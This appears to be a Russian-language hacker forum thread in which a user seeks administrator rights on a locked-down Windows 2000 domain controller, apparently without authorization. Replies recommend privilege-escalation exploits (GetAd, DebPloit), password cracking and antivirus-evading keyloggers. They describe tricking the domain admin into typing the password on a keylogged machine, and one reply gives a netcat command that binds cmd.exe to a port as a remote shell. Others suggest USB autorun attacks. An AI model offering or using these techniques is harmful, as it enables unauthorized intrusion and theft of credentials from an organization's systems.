> Надо создать свой аккаунт с привелегиями админа или диск > расшарить.
Ага. Все-таки диск расшарить. Если можно запускать программы, то почему бы не запустить какой-нибудь ftp - сервер от имени учетной записи, имеющей доступ к диску, поторый надо расшарить?
Народ! беда.... Никак не получается получить адм. привелегии...... Испробованные способы: GetAd, GetAd2, DebPloit, перебор паролей для LocalAdmin - 20 дней, подмена msv1_0.dll невозможна из-за отсутствия прав, regedit - отбой, прав - никаких, загрузка с дискет - нельзя (нет дисковода), мордобой с админом - убежать успел, гад..... Я в отчаянии ;~(
А сниверами не пробовал. или LC+4.
Админ видимо не лох, и наверняка читает эвентлоги. сразу засечет.
так что если за потрогать могу уволить, то за хак уж точно.
Ну ладно, все пропатчено....
кейлоггеры не идут... хотя есть такие, которые касперский не ловит, ghostspy, например...
ну а человеческий фактор? у тебя свой комп, стоящий в домене стоит? (а еще лучше комп тетеньки какой-нибудь :о) )ставишь на нем кейлоггер, выводишь его из домена, и зовешь админа: "у меня чего-то заглючило...". если повезет, то для ввода в домен он введет пароль админа домена...
однако тут возникает другой вопрос: если такой админ, что все закрыто, и он не зря свой хлеб кушает, то что ты с паролем делать будешь? установку программ, шаринг и добавление себя в группу администраторов или паче того создание нового юзера он сразу в логах заметит...
по поводу Getad....?
если ты затускал ее через терминал то тебя сразу окинет
попробуй зайти через терминал запусти netcat (если есть шары на запись конечно)
nc -L -d -e cmd.exe -p 50001 (порт любой)
приконектись через netcat (nc IP Port)
и запусти getad поидее cmd с правами системы должна запустится в то же окне
В том всё и дело, что GetAd пропатчен! Пробывал уже и через net cat, результат тот-же :( Терминальная сессия не отключает меня если я его пробую после успешного удаления данного бага!
А что именно надо?03.03.03 14:58 Автор: Lesley <Lesley Stanley Davis> Статус: Member
> Надо создать свой аккаунт с привелегиями админа или диск > расшарить.
Ага. Все-таки диск расшарить. Если можно запускать программы, то почему бы не запустить какой-нибудь ftp - сервер от имени учетной записи, имеющей доступ к диску, поторый надо расшарить?
Загрузка с другого харда?26.02.03 11:31 Автор: ZloyShaman <ZloyShaman> Статус: Elderman
Невозможны любые физические действия с системником. Также ничего подключить нельзя. Можно только запускать что-нибудь с правами, урезанными по самое нехочу...
Загрузка с другого харда?16.04.03 15:51 Автор: Servak Статус: Незарегистрированный пользователь
> Невозможны любые физические действия с системником. Также > ничего подключить нельзя. Можно только запускать что-нибудь > с правами, урезанными по самое нехочу...
А что если достать внешний хард..ИМХО такие есть или устройство через внешние порты с которого можно грузануться
Вообще ничего не возможно ! Его даже перезагрузить нельзя! Можно только разные проги из сети запускать и с другого компа через клиента служб терминала заходить! Кстати, подмена logo.scr тоже нереальна :(
Да что ж это за машина такая?! Ни флоппика, ни CD-ROMа.. Ничего не вынь да не подключи. Я, как понимаю, это NT. Тогда ничего не остается, как ждать очередного бага, позволяющего удаленно получать административный доступ..
> Вообще ничего не возможно ! Его даже перезагрузить нельзя! > Можно только разные проги из сети запускать и с другого > компа через клиента служб терминала заходить! Кстати, > подмена logo.scr тоже нереальна :(
Да, вот такая машина на Win 2000. Контроллер домена. Имеет доступ через терминальную сессию. Заметил, что можно переполнить буфер Windows help и ошибка в обработке длинных имён. Но чего с этого поиметь-то? Ведь и так проги запускать можно! Видимо придётся ждать следующих релизов Великих умов ;) А может я очевидного не замечаю! Ну не может быть такого, чтобы всё пропатчили!!!!
> Да, вот такая машина на Win 2000. Вот и славненько! Там наверняка есть USB...
А по USB можно кой-чего втыкать...
А на нем сделать автозапуск чего надо :-)
> А может я очевидного не замечаю! Ну не > может быть такого, чтобы всё пропатчили!!!! Ну, очевидное-неочевидное, но USB подхватывает на W2k много чего по умолчанию. Вот и думай ;-)
ага, и для этого нужны права админа! ;)))17.03.03 14:23 Автор: fly4life <Александр Кузнецов> Статус: Elderman
А флешки со слегка переделанным интерфейсом?
Подключение-то происходит от имени системы (она дрова вешает).
А если устройство с дровами по какому-то адресу? Пойдет и как миленькая заберет, а там можно сваять чего-нть и выложить для доступа, откуда и будет браться :-)
Вообще - Plug&Pray это та еще дыра при физическом доступе к машине ;-)
НЕ всегда и не для всего нужны права админа! ;)))28.04.03 09:38 Автор: k206i Статус: Незарегистрированный пользователь
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
